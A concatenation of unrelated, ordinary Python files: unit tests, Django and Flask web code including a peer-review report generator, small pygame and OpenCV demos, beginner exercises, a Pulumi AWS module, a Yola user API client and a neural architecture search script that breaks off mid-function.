args_array = gen_class.ArgParser(self.argv4, do_parse=True)
self.assertEqual(args_array.args_array, self.results)
def test_prog_with_arg(self):
"""Function: test_prog_with_arg
Description: Test with program name with argument.
Arguments:
"""
args_array = gen_class.ArgParser(self.argv2, do_parse=True)
self.assertEqual(args_array.args_array, self.results)
def test_with_two_args(self):
"""Function: test_with_two_args
Description: Test with two arguments, no values.
Arguments:
"""
args_array = gen_class.ArgParser(self.argv3, do_parse=True)
self.assertEqual(args_array.args_array, self.results2)
def test_with_one_arg(self):
"""Function: test_with_one_arg
Description: Test with one argument, no values.
Arguments:
"""
args_array = gen_class.ArgParser(self.argv2, do_parse=True)
self.assertEqual(args_array.args_array, self.results)
def test_argv_no_args(self):
"""Function: test_argv_no_args
Description: Test with argv with no arguments.
Arguments:
"""
args_array = gen_class.ArgParser(self.argv, do_parse=True)
self.assertEqual(args_array.args_array, {})
def test_empty_argv_list2(self):
"""Function: test_empty_argv_list2
Description: Test with argv as empty list.
Arguments:
"""
args_array = gen_class.ArgParser(self.argv)
args_array.argv = []
self.assertTrue(args_array.arg_parse2())
def test_empty_argv_list(self):
"""Function: test_empty_argv_list
Description: Test with argv as empty list.
Arguments:
"""
args_array = gen_class.ArgParser(self.argv)
args_array.argv = []
args_array.arg_parse2()
self.assertEqual(args_array.args_array, {})
if __name__ == "__main__":
unittest.main()
|
from queue import Queue
"""Script to find the first non-repeating string in a stream.
This module reads a file called stream.txt to create a stream of strings. As a string is received, return the first
non-repeating string in the stream.
Example:
$ python nonrepeating.py
Todo:
* Add input argument for file to parse as stream
* Create separate main so this is separate module
"""
def non_repeating(value, counts, q):
"""Finds the first non-repeating string in a stream.
Args:
value (str): Latest string received in the string
counts (dict): Dictionary of strings containing the counts to determine if string is repeated
q (Queue): Container for all strings in stream that have yet determined as being repeated
Return:
str: First non-repeating string. None if all strings are repeated.
"""
q.put(value)
if value in counts:
counts[value] += 1
else:
counts[value] = 1
while not q.empty():
if counts[q.queue[0]] > 1:
q.get()
else:
return q.queue[0]
if q.empty():
return None
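# Illustrative example: feeding the stream 'a', 'b', 'a' one value at a time, with a
# shared `counts` dict and `q` Queue, yields 'a', 'a', 'b' -- once the second 'a'
# arrives, 'a' is repeated and 'b' becomes the first non-repeating string.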
def process_stream():
"""Processes the input file as a stream.
"""
counts = {}
q = Queue()
with open('stream.txt') as stream:
        for value in stream.readlines():
            print(non_repeating(value.strip(), counts, q))
def main():
"""Driver method.
"""
process_stream()
if __name__ == '__main__':
main()
|
from django.urls import path
from . import views
urlpatterns = [
path(route='login' , view=views.LoginView.as_view() , name='login_page') ,
path(route='logout' , view=views.LogoutView.as_view() , name='logout_page') ,
path(route='register' , view=views.RegisterView.as_view() , name='register_page') ,
path(route='forget-password' , view=views.ForgetPasswordView.as_view() , name='forget_password_page') ,
path(route='reset-password/<active_code>' , view=views.ResetPasswordView.as_view() , name='reset_password_page') ,
path(route='activate-account/<str:email_active_code>' , view=views.ActivateAccountView.as_view() , name='activate_account_page')
]
|
from flask import request, make_response, render_template
from flask.views import MethodView
from flask_cas import login_required
from common_functions import display_access_control_error
from catCas import validate_professor
import gbmodel
class MissingStudentException(Exception):
"""
    We raise this exception if we find no students for a given team or session, to be more explicit than e.g.
a KeyError.
"""
pass
class MissingTeamException(Exception):
"""
We raise this exception if we don't find a team in the database when we look it up by id
"""
pass
class GeneratedProfessorReportView(MethodView):
@login_required
def get(self):
"""
Generates a report for a specific student, for viewing by a professor.
Specifically, generates a single report, for a single session and term (midterm or final), for a
single student, with comments deanonymized.
"""
if not validate_professor():
return display_access_control_error()
student_id = request.args.get('student_id')
session_id = request.args.get('session_id')
is_final = request.args.get('is_final')
# TODO find a less fragile way to deal with booleans in urls
if is_final == "False":
is_final = False
else:
is_final = True
try:
pdf = _make_student_report_pdf(student_id, session_id, is_final, is_professor_report=True)
response = make_response(pdf)
except MissingStudentException:
response = make_response(render_template('404.html'), 404)
return response
class GeneratedAnonymousReportView(MethodView):
@login_required
def get(self):
"""
Generates all anonymized reports for printing and handing out to students.
"""
if not validate_professor():
return display_access_control_error()
session_id = request.args.get('session_id')
is_final = request.args.get('is_final')
# TODO find a less fragile way to deal with booleans in urls
if is_final == "False":
is_final = False
else:
is_final = True
try:
pdf = _make_printable_reports(session_id, is_final)
response = make_response(pdf)
except MissingStudentException:
response = make_response(render_template('404.html'), 404)
return response
def _make_printable_reports(session_id, is_final):
"""
Compiles all reports for a session into one for printing.
This means we generate a bunch of anonymized reports, then concatenate them, since page breaks are
handled in the HTML template.
Keyword arguments:
session_id -- session to generate reports for
is_final -- if True, makes a final report. If False, generates a midterm report.
"""
students = gbmodel.students().get_students_in_session(session_id)
if students is None or len(students) <= 0:
raise MissingStudentException("No students for this session.")
report = ""
# Concatenate anonymized reports for all students on the team
for s in students:
report = report + _make_student_report_pdf(s.id, session_id, is_final)
return report
def _make_student_report_pdf(student_id, session_id, is_final, is_professor_report=False):
"""
Renders a report for a student, defaulting to the results of their midterm review.
Unless is_professor_report is set to True, the report will be anonymized.
Keyword arguments:
student_id -- id of the student to generate a report for
session_id -- session to generate reports for
is_final -- if True, makes a final report. If False, generates a midterm report.
is_professor_report -- if True, makes a deanonymized report. If False, generates an anonymous report.
"""
# Get all the info we need to compile the report
reports = gbmodel.reports().get_reports_for_student(student_id, session_id, is_final)
student = gbmodel.students().get_student_in_session(student_id, session_id)
if student is None:
raise MissingStudentException("Trying to generate a report for a student that doesn't exist.")
name = student.name
team_id = student.tid
team = gbmodel.teams().get_team_from_id(team_id)
if team is None:
raise MissingTeamException("The student's team does not appear to exist.")
team_name = team.name
# init scores so we can tally how many 1s we got, 2s, etc.
scores = {
'tech_mastery': [],
'work_ethic': [],
'communication': [],
'cooperation': [],
'initiative': [],
'team_focus': [],
'contribution': [],
'leadership': [],
'organization': [],
'delegation': []
}
for _, value in scores.items():
for i in range(6):
value.append(0)
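    # Each list now holds six counters: votes for ratings 1-5 plus a final slot for N/A.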
# Do any calculations we need to fill in the table.
# Compile all strengths and weaknesses into a list, tally up scores, etc.
strengths = []
weaknesses = []
traits_to_work_on = []
# These two fields are only on self reviews.
what_you_learned = None
proud_of_accomplishment = None
# Iterate through all reports, tallying scores.
# As we go we also collect a list of all the text box answers.
points = 0
for r in reports:
for key, value in scores.items():
this_score = getattr(r, key)
# 6 = N/A in the table
if this_score is None:
this_score = 6
# Increment the # of votes for this score. Ratings start at 1 and not 0 so we have to shift
# things left by one in the table.
scores[key][this_score-1] = scores[key][this_score-1] + 1
# If this is for the professor, all the comments should have names attached.
if is_professor_report:
reporter = gbmodel.students().get_student_in_session(r.reviewer, session_id)
if reporter is None:
raise MissingStudentException("The reporting student in a review doesn't exist.")
weaknesses.append("{}: {}".format(reporter.name, r.weaknesses))
strengths.append("{}: {}".format(reporter.name, r.strengths))
traits_to_work_on.append("{}: {}".format(reporter.name, r.traits_to_work_on))
# There are a handful of fields we only display if it's a professor and a self review.
if r.reviewer == student_id:
# what you learned always
what_you_learned = r.what_you_learned
# proud_of_accomplishment only applies for finals
proud_of_accomplishment = r.proud_of_accomplishment
# If this is the student's self review, the comments get marked with asterisks.
elif r.reviewer == student_id:
weaknesses.append("**{}".format(r.weaknesses))
strengths.append("**{}".format(r.strengths))
traits_to_work_on.append("**{}".format(r.traits_to_work_on))
else:
weaknesses.append(r.weaknesses)
strengths.append(r.strengths)
traits_to_work_on.append(r.traits_to_work_on)
# Tally up points
points += r.points
# Mark all the self reported scores
for r in reports:
if r.reviewer == student_id:
for key, value in scores.items():
this_score = getattr(r, key)
if this_score is not None:
scores[key][this_score-1] = "**{}".format(scores[key][this_score-1])
# Render the HTML version of the template
html = render_template('report.html',
name=name,
team=team_name,
scores=scores,
points=points,
strengths=strengths,
weaknesses=weaknesses,
traits_to_work_on=traits_to_work_on,
what_you_learned=what_you_learned,
proud_of_accomplishment=proud_of_accomplishment)
return html
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging
import pygame
import pygame.freetype
import pygame.gfxdraw
import pygame.locals
from glitchygames.engine import GameEngine
from glitchygames.sprites import BitmappySprite
from glitchygames.scenes import Scene
LOG = logging.getLogger('game')
LOG.setLevel(logging.DEBUG)
# Turn on sprite debugging
BitmappySprite.DEBUG = True
class GameScene(Scene):
log = LOG
def __init__(self, groups=pygame.sprite.LayeredDirty()):
super().__init__(groups=groups)
self.all_sprites = groups
self.screen = pygame.display.get_surface()
self.screen_width = self.screen.get_width()
self.screen_height = self.screen.get_height()
self.screen.fill((255, 255, 0))
self.all_sprites.clear(self.screen, self.background)
class Game(Scene):
# Set your game name/version here.
NAME = "Cached Font Demo"
VERSION = "1.0"
def __init__(self, options):
super().__init__(options=options)
# GameEngine.OPTIONS is set on initialization.
self.log.info(f'Game Options: {options}')
self.next_scene = GameScene()
@classmethod
def args(cls, parser):
parser.add_argument('-v', '--version',
action='store_true',
help='print the game version and exit')
def main():
GameEngine(game=Game).start()
if __name__ == '__main__':
main()
|
# Copyright 2021 Toyota Research Institute. All rights reserved.
import numpy as np
from camviz.objects.object import Object
class BBox2D(Object):
"""
Bounding Box 2D draw class
Parameters
----------
points : np.array
List of points for the bounding box dimension (left, top, right, bottom)
pose : np.array
Bounding box pose on the screen (right, down)
"""
def __init__(self, points, pose=None):
super().__init__(pose=pose)
self.pts = np.array([[points[0], points[1]],
[points[2], points[1]],
[points[2], points[3]],
[points[0], points[3]]])
def draw(self, draw, color_line='gre', color_edge=None):
"""
Draw 2D bounding box on screen
Parameters
----------
draw : camviz.Draw
Draw instance
color_line : str
Line color
color_edge : str
Edge color
"""
# Set color line if provided
if color_line is not None:
draw.color(color_line).width(2).lines(
self.pts[[0, 1, 1, 2, 2, 3, 3, 0]])
# Set color edge if provided
if color_edge is not None:
draw.color(color_edge).size(4).points(self.pts)
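# Illustrative usage sketch (the `draw` instance is assumed to be a camviz.Draw object;
# the coordinates below are made-up example values):
#   box = BBox2D([10, 20, 110, 80])   # left=10, top=20, right=110, bottom=80
#   box.pts -> corners (10,20), (110,20), (110,80), (10,80)
#   box.draw(draw, color_line='gre')  # outline only; pass color_edge to also mark corners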
|
# --------------
# Code starts here
class_1=['Geoffrey Hinton','Andrew Ng','Sebastian Raschka','Yoshua Bengio']
class_2=['Hilary Mason','Carla Gentry','Corinna Cortes']
new_class=class_1+class_2
print(new_class)
new_class.append('Peter Warden')
print(new_class)
new_class.remove('Carla Gentry')
print(new_class)
# Code ends here
# --------------
# Code starts here
courses={'Math':65,'English':70,'History':80,'French':70,'Science':60}
print(courses)
a=courses['Math']
b=courses['English']
c=courses['History']
d=courses['French']
e=courses['Science']
total=a+b+c+d+e
print(total)
a=(total/5)
percentage=a
print(percentage)
# Code ends here
# --------------
# Code starts here
mathematics={'Geoffrey Hinton':78,'Andrew Ng':95, 'Sebastain Raschka':65,'Yoshua Benjio':50,
'Hilary Mason':70,'Corinna Cortes':66,'Peter Warden':75}
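# max() with key=mathematics.get returns the key whose value is largest, i.e. the top scorer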
topper = max(mathematics,key = mathematics.get)
print (topper)
# Code ends here
# --------------
# Given string
topper = 'andrew ng'
# Code starts here
a=topper.split()
print(a)
first_name=a[0]
print(first_name)
last_name=a[1]
print(last_name)
full_name=last_name+ " "+ first_name
print(full_name)
certificate_name=full_name.upper()
a=certificate_name
print(a)
# Code ends here
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
# Export this package's modules as members:
from .default_kms_key import *
from .encryption_by_default import *
from .get_default_kms_key import *
from .get_ebs_volumes import *
from .get_encryption_by_default import *
from .get_snapshot import *
from .get_snapshot_ids import *
from .get_volume import *
from .snapshot import *
from .snapshot_copy import *
from .volume import *
from ._inputs import *
from . import outputs
def _register_module():
import pulumi
from .. import _utilities
class Module(pulumi.runtime.ResourceModule):
_version = _utilities.get_semver_version()
def version(self):
return Module._version
def construct(self, name: str, typ: str, urn: str) -> pulumi.Resource:
if typ == "aws:ebs/defaultKmsKey:DefaultKmsKey":
return DefaultKmsKey(name, pulumi.ResourceOptions(urn=urn))
elif typ == "aws:ebs/encryptionByDefault:EncryptionByDefault":
return EncryptionByDefault(name, pulumi.ResourceOptions(urn=urn))
elif typ == "aws:ebs/snapshot:Snapshot":
return Snapshot(name, pulumi.ResourceOptions(urn=urn))
elif typ == "aws:ebs/snapshotCopy:SnapshotCopy":
return SnapshotCopy(name, pulumi.ResourceOptions(urn=urn))
elif typ == "aws:ebs/volume:Volume":
return Volume(name, pulumi.ResourceOptions(urn=urn))
else:
raise Exception(f"unknown resource type {typ}")
_module_instance = Module()
pulumi.runtime.register_resource_module("aws", "ebs/defaultKmsKey", _module_instance)
pulumi.runtime.register_resource_module("aws", "ebs/encryptionByDefault", _module_instance)
pulumi.runtime.register_resource_module("aws", "ebs/snapshot", _module_instance)
pulumi.runtime.register_resource_module("aws", "ebs/snapshotCopy", _module_instance)
pulumi.runtime.register_resource_module("aws", "ebs/volume", _module_instance)
_register_module()
|
import cv2
def main():
#cv2.namedWindow('show',0)
#cv2.resizeWindow('show',640,360)
    vc = cv2.VideoCapture(0)  # read from the webcam
    #vc = cv2.VideoCapture('./images/video2.mp4')  # or read a chosen video file instead
    vlen = int(vc.get(cv2.CAP_PROP_FRAME_COUNT))  # read the video's metadata via vc's get() function
    print (vlen)  # a webcam reports a video length of 0
    while True:
        ret, img = vc.read()  # read an img frame from the vc object with read()
        # ret is True when read() returns an image, False otherwise
        if ret == False:
            break
        start = cv2.getTickCount()
        img = cv2.flip(img, 1)  # webcams are usually mirrored, so flip left-right
# preprocess
#img_rgb = cv2.cvtColor(img_orig, cv2.COLOR_BGR2RGB)
# detector
#img_rgb_vga = cv2.resize(img_rgb, (640, 360))
time = (cv2.getTickCount() - start) / cv2.getTickFrequency() * 1000
print ('[INFO] time: %.2fms'%time)
cv2.imshow('show', img)
key = cv2.waitKey(1)
if key == 27:
break
if __name__ == '__main__':
main()
|
from .awd_lstm import *
from .transformer import *
__all__ = [*awd_lstm.__all__, *transformer.__all__]
|
from django.test import TestCase
from django.db import models
from django.core import mail
from django.contrib.auth import get_user_model
from ..models import Blog, Post, Subscription, Feed
class BlogModelTest(TestCase):
fixtures = ['initial_data.json']
def test_author_label(self):
blog = Blog.objects.get(id=1)
field_label = blog._meta.get_field('author').verbose_name
self.assertEqual(field_label, 'author')
def test_author_field_related_model(self):
blog = Blog.objects.get(id=1)
related_model = blog._meta.get_field('author').related_model
self.assertEqual(related_model, get_user_model())
def test_author_field_on_detele(self):
blog = Blog.objects.get(id=1)
on_detele = blog._meta.get_field(
'author').remote_field.on_delete
self.assertEqual(on_detele, models.CASCADE)
def test_object_name_is_author_username(self):
blog = Blog.objects.get(id=1)
expected_object_name = blog.author.get_username()
self.assertEqual(str(blog), expected_object_name)
class PostModelTest(TestCase):
fixtures = ['initial_data.json']
def test_title_label(self):
post = Post.objects.get(id=1)
field_label = post._meta.get_field('title').verbose_name
self.assertEqual(field_label, 'title')
def test_name_max_length(self):
post = Post.objects.get(id=1)
max_length = post._meta.get_field('title').max_length
self.assertEqual(max_length, 255)
def test_blog_label(self):
post = Post.objects.get(id=1)
field_label = post._meta.get_field('blog').verbose_name
self.assertEqual(field_label, 'blog')
def test_blog_field_related_model(self):
post = Post.objects.get(id=1)
related_model = post._meta.get_field('blog').related_model
self.assertEqual(related_model, Blog)
def test_blog_field_on_detele(self):
post = Post.objects.get(id=1)
on_detele = post._meta.get_field(
'blog').remote_field.on_delete
self.assertEqual(on_detele, models.CASCADE)
def test_date_posted_label(self):
post = Post.objects.get(id=1)
field_label = post._meta.get_field('posted').verbose_name
self.assertEqual(field_label, 'posted')
def test_date_added_auto_now_add(self):
post = Post.objects.get(id=1)
auto_now_add = post._meta.get_field('posted').auto_now_add
self.assertEqual(auto_now_add, True)
def test_content_label(self):
post = Post.objects.get(id=1)
field_label = post._meta.get_field('content').verbose_name
self.assertEqual(field_label, 'content')
def test_content_max_length(self):
post = Post.objects.get(id=1)
max_length = post._meta.get_field('content').max_length
self.assertEqual(max_length, 10000)
def test_ordering(self):
post = Post.objects.get(id=1)
ordering = post._meta.ordering
self.assertEqual(ordering, ['-posted'])
def test_save_method(self):
blog = Blog.objects.get(id=2)
subscriber = get_user_model().objects.get(pk=1)
subscription = Subscription.objects.get(pk=1)
post = Post.objects.create(title='Test title', blog=blog)
feed = Feed.objects.get(pk=7)
self.assertEqual(feed.user, subscriber)
self.assertEqual(feed.subscription, subscription)
self.assertEqual(feed.post.id, post.id)
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].subject, 'New post')
def test_object_name_is_title(self):
post = Post.objects.get(id=1)
expected_object_name = post.title
self.assertEqual(str(post), expected_object_name)
class SubscriptionModelTest(TestCase):
fixtures = ['initial_data.json']
def test_user_label(self):
subscription = Subscription.objects.get(id=1)
field_label = subscription._meta.get_field('user').verbose_name
self.assertEqual(field_label, 'user')
def test_user_field_related_model(self):
subscription = Subscription.objects.get(id=1)
related_model = subscription._meta.get_field('user').related_model
self.assertEqual(related_model, get_user_model())
def test_user_field_on_detele(self):
subscription = Subscription.objects.get(id=1)
on_detele = subscription._meta.get_field(
'user').remote_field.on_delete
self.assertEqual(on_detele, models.CASCADE)
def test_blog_label(self):
subscription = Subscription.objects.get(id=1)
field_label = subscription._meta.get_field('blog').verbose_name
self.assertEqual(field_label, 'blog')
def test_blog_field_related_model(self):
subscription = Subscription.objects.get(id=1)
related_model = subscription._meta.get_field('blog').related_model
self.assertEqual(related_model, Blog)
def test_blog_field_on_detele(self):
subscription = Subscription.objects.get(id=1)
on_detele = subscription._meta.get_field(
'blog').remote_field.on_delete
self.assertEqual(on_detele, models.CASCADE)
def test_unique_together(self):
subscription = Subscription.objects.get(id=1)
unique_together = subscription._meta.unique_together
self.assertEqual(unique_together, (('user', 'blog'),))
def test_object_name_is_blog_author_username(self):
subscription = Subscription.objects.get(id=1)
expected_object_name = subscription.blog.author.username
self.assertEqual(str(subscription), expected_object_name)
class FeedModelTest(TestCase):
fixtures = ['initial_data.json']
def test_user_label(self):
feed = Feed.objects.get(id=1)
field_label = feed._meta.get_field('user').verbose_name
self.assertEqual(field_label, 'user')
def test_user_field_related_model(self):
feed = Feed.objects.get(id=1)
related_model = feed._meta.get_field('user').related_model
self.assertEqual(related_model, get_user_model())
def test_user_field_on_detele(self):
feed = Feed.objects.get(id=1)
on_detele = feed._meta.get_field(
'user').remote_field.on_delete
self.assertEqual(on_detele, models.CASCADE)
def test_post_label(self):
feed = Feed.objects.get(id=1)
field_label = feed._meta.get_field('post').verbose_name
self.assertEqual(field_label, 'post')
def test_post_field_related_model(self):
feed = Feed.objects.get(id=1)
related_model = feed._meta.get_field('post').related_model
self.assertEqual(related_model, Post)
def test_post_field_on_detele(self):
feed = Feed.objects.get(id=1)
on_detele = feed._meta.get_field(
'post').remote_field.on_delete
self.assertEqual(on_detele, models.CASCADE)
def test_subscription_label(self):
feed = Feed.objects.get(id=1)
field_label = feed._meta.get_field('subscription').verbose_name
self.assertEqual(field_label, 'subscription')
def test_subscription_field_related_model(self):
feed = Feed.objects.get(id=1)
related_model = feed._meta.get_field('subscription').related_model
self.assertEqual(related_model, Subscription)
def test_subscription_field_on_detele(self):
feed = Feed.objects.get(id=1)
on_detele = feed._meta.get_field(
'subscription').remote_field.on_delete
self.assertEqual(on_detele, models.CASCADE)
def test_is_read_label(self):
feed = Feed.objects.get(id=1)
field_label = feed._meta.get_field('is_read').verbose_name
self.assertEqual(field_label, 'is read')
def test_is_read_default(self):
feed = Feed.objects.get(id=1)
default = feed._meta.get_field('is_read').default
self.assertEqual(default, False)
def test_ordering(self):
feed = Feed.objects.get(id=1)
ordering = feed._meta.ordering
self.assertEqual(ordering, ['-post__posted'])
def test_unique_together(self):
feed = Feed.objects.get(id=1)
unique_together = feed._meta.unique_together
self.assertEqual(unique_together, (('user', 'post', 'subscription'),))
def test_object_name_is_post_title(self):
feed = Feed.objects.get(id=1)
expected_object_name = feed.post.title
self.assertEqual(str(feed), expected_object_name)
|
class UserResourceMixin(object):
"""Methods for managing User resources."""
def create_user(self, **attributes):
"""Create a user.
>>> user = yola.create_user(
name='John',
surname='Smith',
email='johnsmith@example.com',
partner_id='WL_PARTNER_ID',
preferences={'preference_name': 'preference_value'})
>>> user['name']
'John'
"""
response = self.post(self._user_path(), json=attributes).json()
response['signup_date'] = response.pop('signupDate')
return response
def update_user(self, user_id, **attributes):
"""Update a user.
>>> yola.update_user('user_id', name='New name')
"""
return self.patch(self._user_path(user_id), json=attributes).json()
def get_user(self, user_id):
"""Get details for a particular user.
>>> user = yola.get_user('user_id')
>>> user['name']
'John'
"""
response = self.get(self._user_path(user_id)).json()
response['signup_date'] = response.pop('signupDate')
return response
def list_users(self, **filters):
"""Return paginated list of users.
>>> yola.list_users()
{
'count': 999,
'previous': None,
'next': 'https://wl.qa.yola.net/pr/users/?page=2',
'results': [
{'name': 'John', 'surname': 'Smith', ...}
]
}
If there are no users, ``results`` will be an empty list. No exception
will be raised.
You may pass pagination options and attribute filters as keyword
arguments. See https://wl.qa.yola.net/users/ for available parameters.
For example:
>>> yola.list_users(page=2, page_size=50, partner_id='WL_YOLA')
"""
return self.get(self._user_path(), params=filters).json()
def delete_user(self, user_id):
"""Delete a user.
>>> yola.delete_user('user_id')
"""
self.delete(self._user_path(user_id))
def get_sso_create_site_url(self, user_id, domain, locale=None):
"""Get SSO create site url for a particular user and domain.
>>> yola.get_sso_create_site_url('user_id', 'example.com')
"""
params = {'domain': domain, 'locale': locale}
return self.get(
self._user_path(
user_id, 'sso_url_create_site'), params=params).json()['url']
def get_sso_open_site_url(self, user_id, site_id=None, locale=None):
"""Get SSO open site url for a particular user.
>>> yola.get_sso_open_site_url('user_id')
"""
return self.get(
self._user_path(user_id, 'sso_url_open_site'), params={
'site_id': site_id,
'locale': locale
}).json()['url']
def get_sso_url(self, user_id, site_id=None,
destination='editor', locale=None):
"""Get SSO url for a particular ws user
>>> yola.get_sso_url('user_id')
"""
return self.get(
self._user_path(user_id, 'sso-url'), params={
'site_id': site_id,
'destination': destination,
'locale': locale,
}).json()['url']
def get_user_wsites(self, user_id):
return self.get(self._user_path(user_id, 'sites')).json()
def set_site_url(self, user_id, site_url):
"""Set new site url for a particular user.
>>> yola.set_site_url('user_id', 'https://new-domain.com')
"""
return self.post(
self._user_path(user_id, 'set-site-url'),
json={'site_url': site_url}
).json()
def _user_path(self, *parts):
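        # e.g. _user_path('user_id', 'sites') -> '/users/user_id/sites/'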
path = '/'.join(['users'] + list(parts))
return '/%s/' % path
|
import pickle
import sys
import time
import numpy as np
import torch
from fvcore.nn import FlopCountAnalysis
import xnas.core.config as config
import xnas.logger.logging as logging
from xnas.core.config import cfg
from xnas.core.builder import setup_env, space_builder, optimizer_builder
import xnas.algorithms.RMINAS.sampler.sampling as sampling
from xnas.algorithms.RMINAS.utils.RMI_torch import RMI_loss
from xnas.algorithms.RMINAS.sampler.RF_sampling import RF_suggest
from xnas.algorithms.RMINAS.utils.random_data import get_random_data
from xnas.spaces.DARTS.utils import geno_from_alpha, reformat_DARTS
from xnas.spaces.NASBench201.utils import dict2config, get_cell_based_tiny_net, CellStructure
config.load_configs()
logger = logging.get_logger(__name__)
# RMINAS hyperparameters initialization
RF_space = None
api = None
def rminas_hp_builder():
global RF_space, api
if cfg.SPACE.NAME == 'infer_nb201':
from nas_201_api import NASBench201API
api = NASBench201API(cfg.BENCHMARK.NB201PATH)
RF_space = 'nasbench201'
elif cfg.SPACE.NAME == 'infer_darts':
RF_space = 'darts'
elif cfg.SPACE.NAME == 'nasbenchmacro':
RF_space = 'nasbenchmacro'
from xnas.evaluations.NASBenchMacro.evaluate import evaluate, data
api = data
elif cfg.SPACE.NAME == 'proxyless':
RF_space = 'proxyless'
# for example : arch = '00000000'
# arch = ''
# evaluate(arch)
def main():
device = setup_env()
rminas_hp_builder()
assert cfg.SPACE.NAME in ['infer_nb201', 'infer_darts',"nasbenchmacro", "proxyless"]
assert cfg.LOADER.DATASET in ['cifar10', 'cifar100', 'imagenet', 'imagenet16_120'], 'dataset error'
if cfg.LOADER.DATASET == 'cifar10':
from xnas.algorithms.RMINAS.teacher_model.resnet20_cifar10.resnet import resnet20
checkpoint_res = torch.load('xnas/algorithms/RMINAS/teacher_model/resnet20_cifar10/resnet20.th')
network = torch.nn.DataParallel(resnet20())
network.load_state_dict(checkpoint_res['state_dict'])
network = network.module
elif cfg.LOADER.DATASET == 'cifar100':
from xnas.algorithms.RMINAS.teacher_model.resnet101_cifar100.resnet import resnet101
network = resnet101()
network.load_state_dict(torch.load('xnas/algorithms/RMINAS/teacher_model/resnet101_cifar100/resnet101.pth'))
elif cfg.LOADER.DATASET == 'imagenet':
assert cfg.SPACE.NAME in ('infer_darts', 'proxyless')
logger.warning('Our method does not directly search in ImageNet.')
logger.warning('Only partial tests have been conducted, please use with caution.')
import xnas.algorithms.RMINAS.teacher_model.fbresnet_imagenet.fbresnet as fbresnet
network = fbresnet.fbresnet152()
elif cfg.LOADER.DATASET == 'imagenet16_120':
assert cfg.SPACE.NAME == 'infer_nb201'
from nas_201_api import ResultsCount
"""Teacher Network: using best arch searched from cifar10 and weight from nb201."""
filename = 'xnas/algorithms/RMINAS/teacher_model/nb201model_imagenet16120/009930-FULL.pth'
xdata = torch.load(filename)
odata = xdata['full']['all_results'][('ImageNet16-120', 777)]
result = ResultsCount.create_from_state_dict(odata)
result.get_net_param()
arch_config = result.get_config(CellStructure.str2structure) # create the network with params
net_config = dict2config(arch_config, None)
network = get_cell_based_tiny_net(net_config)
network.load_state_dict(result.get_net_param())
network.cuda()
"""selecting well-performed data."""
more_data_X, more_data_y = get_random_data(cfg.LOADER.BATCH_SIZE, cfg.LOADER.DATASET)
with torch.no_grad():
ce_loss = torch.nn.CrossEntropyLoss(reduction='none').cuda()
more_logits = network(more_data_X)
        _, indices = torch.topk(-ce_loss(more_logits, more_data_y).cpu().detach(), cfg.LOADER.BATCH_SIZE)
        # keep the BATCH_SIZE samples on which the teacher is most confident (lowest CE loss)
        data_y = more_data_y[indices].detach()
        data_X = more_data_X[indices].detach()
with torch.no_grad():
feature_res = network.feature_extractor(data_X)
RFS = RF_suggest(space=RF_space, logger=logger, api=api, thres_rate=cfg.RMINAS.RF_THRESRATE, seed=cfg.RNG_SEED)
# loss function
loss_fun_cka = RMI_loss(data_X.size()[0])
loss_fun_cka = loss_fun_cka.requires_grad_()
loss_fun_cka.cuda()
loss_fun_log = torch.nn.CrossEntropyLoss().cuda()
def train_arch(modelinfo):
flops = None
if cfg.SPACE.NAME == 'infer_nb201':
# get arch
arch_config = {
'name': 'infer.tiny',
'C': 16, 'N': 5,
'arch_str':api.arch(modelinfo),
'num_classes': cfg.LOADER.NUM_CLASSES}
net_config = dict2config(arch_config, None)
model = get_cell_based_tiny_net(net_config).cuda()
elif cfg.SPACE.NAME == 'infer_darts':
cfg.TRAIN.GENOTYPE = str(modelinfo)
model = space_builder().cuda()
elif cfg.SPACE.NAME == 'nasbenchmacro':
model = space_builder().cuda()
optimizer = optimizer_builder("SGD", model.parameters())
elif cfg.SPACE.NAME == 'proxyless':
            model = space_builder(
                stage_width_list=[16, 24, 40, 80, 96, 192, 320],
                depth_param=modelinfo[:6],
                ks=modelinfo[6:27][modelinfo[6:27] > 0],
                expand_ratio=modelinfo[27:][modelinfo[27:] > 0],
                dropout_rate=0,
            ).cuda()
optimizer = optimizer_builder("SGD", model.parameters())
with torch.no_grad():
tensor = (torch.rand(1, 3, 224, 224).cuda(),)
flops = FlopCountAnalysis(model, tensor).total()
# lr_scheduler = lr_scheduler_builder(optimizer)
# nbm_trainer = OneShotTrainer(
# supernet=model,
# criterion=criterion,
# optimizer=optimizer,
# lr_scheduler=lr_scheduler,
# train_loader=train_loader,
# test_loader=valid_loader,
# sample_type='iter'
# )
model.train()
# weights optimizer
optimizer = optimizer_builder("SGD", model.parameters())
epoch_losses = []
for cur_epoch in range(1, cfg.OPTIM.MAX_EPOCH+1):
optimizer.zero_grad()
features, logits = model.forward_with_features(data_X, modelinfo)
loss_cka = loss_fun_cka(features, feature_res)
loss_logits = loss_fun_log(logits, data_y)
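            # Mix the feature-matching loss (loss_fun_cka, an RMI_loss over teacher/student
            # features) with the plain cross-entropy loss; LOSS_BETA weights the feature term.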
loss = cfg.RMINAS.LOSS_BETA * loss_cka + (1-cfg.RMINAS.LOSS_BETA)*loss_logits
loss.backward()
optimizer.step()
epoch_losses.append(loss.detach().cpu().item())
if cur_epoch == cfg.OPTIM.MAX_EPOCH:
return loss.cpu().detach().numpy(), {'epoch_losses':epoch_losses, 'flops':flops}
trained_arch_darts, trained_loss = [], []
def train_procedure(sample):
if cfg.SPACE.NAME == 'infer_nb201':
            mixed_loss, info = train_arch(sample)
mixed_loss = np.inf if np.isnan(mixed_loss) else mixed_loss
trained_loss.append(mixed_loss)
arch_arr = sampling.nb201genostr2array(api.arch(sample))
RFS.trained_arch.append({'arch':arch_arr, 'loss':mixed_loss})
RFS.trained_arch_index.append(sample)
elif cfg.SPACE.NAME == 'infer_darts':
sample_geno = geno_from_alpha(sampling.darts_sug2alpha(sample)) # type=Genotype
trained_arch_darts.append(str(sample_geno))
            mixed_loss, info = train_arch(sample_geno)
mixed_loss = np.inf if np.isnan(mixed_loss) else mixed_loss
trained_loss.append(mixed_loss)
RFS.trained_arch.append({'arch':sample, 'loss':mixed_loss})
elif cfg.SPACE.NAME == 'nasbenchmacro':
            sample_geno = ''.join(sample.astype('str'))  # encode the sampled architecture as a digit string
trained_arch_darts.append((sample_geno))
mixed_loss, info = train_arch(sample)
mixed_loss = np.inf if np.isnan(mixed_loss) else mixed_loss
